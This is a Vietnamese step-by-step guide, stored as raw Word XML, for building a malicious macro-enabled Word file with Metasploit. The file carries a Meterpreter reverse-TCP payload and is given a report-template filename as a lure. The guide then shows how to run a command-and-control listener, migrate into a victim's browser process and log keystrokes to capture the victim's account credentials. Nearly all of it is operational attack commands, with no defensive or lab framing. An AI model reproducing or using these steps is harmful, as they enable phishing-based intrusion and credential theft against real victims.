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F0A1" w14:textId="583F182B" w:rsidR="00127214" w:rsidRDefault="00926363" w:rsidP="00926363">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Docm và keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078EFDFE" w14:textId="07470B3D" w:rsidR="00926363" w:rsidRDefault="00926363" w:rsidP="00926363">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo file docm và reverseshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86C913" w14:textId="747F2FEA" w:rsidR="00926363" w:rsidRDefault="00E247EC" w:rsidP="00926363">
      <w:r>
        <w:t>Vào msfconsole, và chọn module khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E1201" w14:textId="63648CC5" w:rsidR="00E247EC" w:rsidRDefault="00E247EC" w:rsidP="00E247EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh: use </w:t>
      </w:r>
      <w:r w:rsidRPr="00E247EC">
        <w:t>exploit/multi/fileformat/office_word_macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23795542" w14:textId="0EA24DD4" w:rsidR="00E247EC" w:rsidRDefault="00E247EC" w:rsidP="00E247EC">
      <w:r>
        <w:t>Cài đặt payload để reverseshell về 2C server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03907491" w14:textId="3A9A1921" w:rsidR="00E247EC" w:rsidRDefault="00E247EC" w:rsidP="00E247EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh: set payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00E247EC">
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C2DE21" w14:textId="009629E1" w:rsidR="008B46CF" w:rsidRDefault="008B46CF" w:rsidP="008B46CF">
      <w:r w:rsidRPr="008B46CF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E084848" wp14:editId="222F0316">
            <wp:extent cx="594360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060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD149C6" w14:textId="5248A419" w:rsidR="008B46CF" w:rsidRDefault="008B46CF" w:rsidP="008B46CF">
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00174E3A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để hiện thị các options payload</w:t>
      </w:r>
      <w:r w:rsidR="00174E3A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC346A" w14:textId="085D2717" w:rsidR="00174E3A" w:rsidRDefault="00174E3A" w:rsidP="008B46CF">
      <w:r w:rsidRPr="00174E3A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02AA6CAF" wp14:editId="745837BF">
            <wp:extent cx="5943600" cy="27724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772410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B14D3B" w14:textId="36EB69A2" w:rsidR="00174E3A" w:rsidRDefault="00174E3A" w:rsidP="00174E3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để </w:t>
      </w:r>
      <w:r w:rsidR="00152D40">
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file custom template, chỉnh </w:t>
      </w:r>
      <w:r w:rsidR="00CE5334">
        <w:t>option CUSTOMTEMPLATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862CB52" w14:textId="1C86D648" w:rsidR="00CE5334" w:rsidRDefault="00CE5334" w:rsidP="00CE5334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set CUSTOMTEMPLATE &lt;fullpath to template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD74BF7" w14:textId="4AC3ADDF" w:rsidR="00CE5334" w:rsidRDefault="00CE5334" w:rsidP="00CE5334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ví dụ: </w:t>
      </w:r>
      <w:r w:rsidR="00152D40">
        <w:t xml:space="preserve">set CUSTOMTEMPLATE </w:t>
      </w:r>
      <w:r w:rsidR="00152D40" w:rsidRPr="00152D40">
        <w:t>/mnt/c/Users/tiend/Desktop/hpt/malw/word_malw/template.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF2141C" w14:textId="5443D9E1" w:rsidR="00152D40" w:rsidRDefault="00152D40" w:rsidP="00152D40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Để đặt tên file docm xuất ra, chỉnh option FILENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A6BD2" w14:textId="0D79265B" w:rsidR="00152D40" w:rsidRDefault="00152D40" w:rsidP="00152D40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set FILENAME &lt;filename.docm&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC130BF" w14:textId="0E471C86" w:rsidR="00152D40" w:rsidRDefault="00152D40" w:rsidP="00152D40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ví dụ: set FILENAME Mau_Bao_Cao_2022.docm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DFB03" w14:textId="39034B9D" w:rsidR="00152D40" w:rsidRDefault="00152D40" w:rsidP="00152D40">
      <w:r w:rsidRPr="00152D40">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E75804D" wp14:editId="7EFFDE62">
            <wp:extent cx="5943600" cy="27705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770505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78A32C" w14:textId="570C9106" w:rsidR="00152D40" w:rsidRDefault="00585C96" w:rsidP="00585C96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Để cài đặt địa chỉ IP 2C server, chỉnh option LHOST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824726B" w14:textId="70D7C7C4" w:rsidR="00585C96" w:rsidRDefault="00585C96" w:rsidP="00585C96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST &lt;địa chỉ IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117AE87" w14:textId="6892AD75" w:rsidR="00585C96" w:rsidRDefault="00585C96" w:rsidP="00585C96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ví dụ: set LHOST 192.168.40.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E155A49" w14:textId="7C1F4A3C" w:rsidR="00E92425" w:rsidRDefault="00E92425" w:rsidP="00E92425">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Để cài đặt cổng 2C server chỉnh option LPORT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FE70B" w14:textId="16F483F0" w:rsidR="00E92425" w:rsidRDefault="009A0D54" w:rsidP="00E92425">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E92425">
        <w:t>et LPORT &lt;số cổng&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214780B2" w14:textId="598BE760" w:rsidR="00E92425" w:rsidRDefault="00E92425" w:rsidP="00E92425">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ví dụ: set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673833C7" w14:textId="3FA499B7" w:rsidR="007A60DA" w:rsidRDefault="007A60DA" w:rsidP="007A60DA">
      <w:r w:rsidRPr="007A60DA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51FBAE8B" wp14:editId="46F1A71B">
            <wp:extent cx="5943600" cy="27311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731135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9D254" w14:textId="66F9F901" w:rsidR="007A60DA" w:rsidRDefault="007A60DA" w:rsidP="007A60DA">
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để build file docm</w:t>
      </w:r>
      <w:r w:rsidR="00BD5D8F" w:rsidRPr="00BD5D8F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED27FFF" wp14:editId="52470F49">
            <wp:extent cx="5943600" cy="106172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061720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26063A9F" w14:textId="02490559" w:rsidR="007A60DA" w:rsidRDefault="000F6E35" w:rsidP="000F6E35">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Khởi chạy 2C server và keyscan để thực hiện keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4219B" w14:textId="77777777" w:rsidR="00C32C54" w:rsidRDefault="00C32C54" w:rsidP="00C32C54">
      <w:r>
        <w:t>Vào msfconsole, và chọn module khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B9F9C6" w14:textId="45F8175E" w:rsidR="00C32C54" w:rsidRDefault="00C32C54" w:rsidP="00C32C54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh: use </w:t>
      </w:r>
      <w:r w:rsidRPr="00E247EC">
        <w:t>exploit/multi/</w:t>
      </w:r>
      <w:r>
        <w:t>handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFD8D4" w14:textId="78A7EFB2" w:rsidR="00C32C54" w:rsidRDefault="00C32C54" w:rsidP="00C32C54">
      <w:r>
        <w:t xml:space="preserve">Cài đặt payload để </w:t>
      </w:r>
      <w:r>
        <w:t>chạy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2C server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E03D2" w14:textId="77777777" w:rsidR="00C32C54" w:rsidRDefault="00C32C54" w:rsidP="00C32C54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh: set payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00E247EC">
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B293F" w14:textId="0AF0A6D9" w:rsidR="007A60DA" w:rsidRDefault="00262076" w:rsidP="007A60DA">
      <w:r w:rsidRPr="00262076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50994A5C" wp14:editId="3986FEFB">
            <wp:extent cx="5943600" cy="655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5320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3055F" w14:textId="77777777" w:rsidR="00262076" w:rsidRDefault="00262076" w:rsidP="00262076">
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00174E3A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để hiện thị các options payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D8722" w14:textId="2A60D6CA" w:rsidR="00262076" w:rsidRDefault="00262076" w:rsidP="007A60DA">
      <w:r w:rsidRPr="00262076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF2CA70" wp14:editId="2B7B0AFA">
            <wp:extent cx="5943600" cy="26974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2697480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A22C6" w14:textId="77777777" w:rsidR="00262076" w:rsidRDefault="00262076" w:rsidP="00262076">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Để cài đặt địa chỉ IP 2C server, chỉnh option LHOST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4C0E6" w14:textId="77777777" w:rsidR="00262076" w:rsidRDefault="00262076" w:rsidP="00262076">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST &lt;địa chỉ IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71290F85" w14:textId="7C404C25" w:rsidR="00262076" w:rsidRDefault="00262076" w:rsidP="00262076">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ví dụ: set LHOST </w:t>
      </w:r>
      <w:r>
        <w:t>0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601CBF2D" w14:textId="17A12397" w:rsidR="00262076" w:rsidRDefault="00A6324C" w:rsidP="007A60DA">
      <w:r>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="007A60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để </w:t>
      </w:r>
      <w:r>
        <w:t>chạy 2C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF1779" w14:textId="4ED6F2B2" w:rsidR="00A6324C" w:rsidRDefault="00A6324C" w:rsidP="007A60DA">
      <w:r w:rsidRPr="00A6324C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D370821" wp14:editId="533FBA32">
            <wp:extent cx="5534797" cy="1028844"/>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534797" cy="1028844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27296B09" w14:textId="099280A9" w:rsidR="00A6324C" w:rsidRDefault="00A6324C" w:rsidP="007A60DA">
      <w:r>
        <w:t>Khi victim thực hiện mở file docm, thì sẽ từ động reverseshell về địa chỉ IP 2C đã được chỉ định. Kết quả hiện thị như hình dưới là reverseshell thành công</w:t>
      </w:r>
      <w:r w:rsidR="00B632FE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDADBCE" w14:textId="400030A2" w:rsidR="00A6324C" w:rsidRDefault="00A6324C" w:rsidP="007A60DA">
      <w:r w:rsidRPr="00A6324C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C63A05" wp14:editId="449C6CA1">
            <wp:extent cx="5943600" cy="17024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1702435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D7A12" w14:textId="6DA79330" w:rsidR="00707AA8" w:rsidRDefault="00707AA8" w:rsidP="007A60DA">
      <w:r>
        <w:t>Để thực hiện keylogging máy victim, bắt buộc phải sử dụng phương thức reverseshell thông qua meterpreter như trên, và sẽ dung process injection để keyscan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6786C" w14:textId="5295A965" w:rsidR="00707AA8" w:rsidRDefault="00707AA8" w:rsidP="007A60DA">
      <w:r>
        <w:t>Dùng lệnh ps để list ra hết các process đang chạy trong máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290692A" w14:textId="13435C5B" w:rsidR="00707AA8" w:rsidRDefault="00707AA8" w:rsidP="007A60DA">
      <w:r w:rsidRPr="00707AA8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A3AC77B" wp14:editId="51A9C5E6">
            <wp:extent cx="5943600" cy="37185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3718560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE5A9B" w14:textId="7ABB5C01" w:rsidR="001B0F2A" w:rsidRDefault="00707AA8" w:rsidP="007A60DA">
      <w:r>
        <w:t>Để keylogging được tài khoản của nạn nhân thì thường sẽ injection vào process là trình duyệt như chrome, firefox, IE,…</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Ví dụ: có IE </w:t>
      </w:r>
      <w:r w:rsidR="001B0F2A">
        <w:t>đang chạy với PID là 1664, ta sẽ thực hiện migrate vào process đó với lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C58396" w14:textId="102DFA73" w:rsidR="001B0F2A" w:rsidRDefault="001B0F2A" w:rsidP="001B0F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>migrate &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A1342" w14:textId="77666C17" w:rsidR="001B0F2A" w:rsidRDefault="001B0F2A" w:rsidP="001B0F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>migrate 1664</w:t>
      </w:r>
      <w:r w:rsidRPr="001B0F2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B0F2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B17306E" wp14:editId="53A9CCB1">
            <wp:extent cx="3286584" cy="590632"/>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286584" cy="590632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C6415" w14:textId="79260C62" w:rsidR="001B0F2A" w:rsidRDefault="001B0F2A" w:rsidP="001B0F2A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau khi migrate thành công, thực hiện lệnh keyscan_start để bắt đầu keylogging</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Chờ đợi trong một vài phút rồi dung lệnh keyscan_dump để lấy dữ liệu về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5F3D4" w14:textId="77097BA3" w:rsidR="001B0F2A" w:rsidRPr="00926363" w:rsidRDefault="0000010C" w:rsidP="001B0F2A">
      <w:r w:rsidRPr="0000010C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41D91932" wp14:editId="6ADF622F">
            <wp:extent cx="5943600" cy="188658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1886585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B0F2A" w:rsidRPr="0092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D53CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94227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81E17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB96A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17076">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="673412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63"/>
    <w:rsid w:val="0000010C"/>
    <w:rsid w:val="000F6E35"/>
    <w:rsid w:val="00127214"/>
    <w:rsid w:val="00152D40"/>
    <w:rsid w:val="00174E3A"/>
    <w:rsid w:val="001B0F2A"/>
    <w:rsid w:val="00262076"/>
    <w:rsid w:val="0027585B"/>
    <w:rsid w:val="00585C96"/>
    <w:rsid w:val="00707AA8"/>
    <w:rsid w:val="007A60DA"/>
    <w:rsid w:val="008B46CF"/>
    <w:rsid w:val="00926363"/>
    <w:rsid w:val="009A0D54"/>
    <w:rsid w:val="00A6324C"/>
    <w:rsid w:val="00AE5E54"/>
    <w:rsid w:val="00B632FE"/>
    <w:rsid w:val="00BD5D8F"/>
    <w:rsid w:val="00C32C54"/>
    <w:rsid w:val="00C54081"/>
    <w:rsid w:val="00CD329B"/>
    <w:rsid w:val="00CE5334"/>
    <w:rsid w:val="00D34A20"/>
    <w:rsid w:val="00E247EC"/>
    <w:rsid w:val="00E9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B6AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C84B4E2D-6DB9-4660-9D82-829399C8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076"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00926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3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63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 Van Tien</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dung Nguyen Van Tien</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-17T02:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-17T06:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>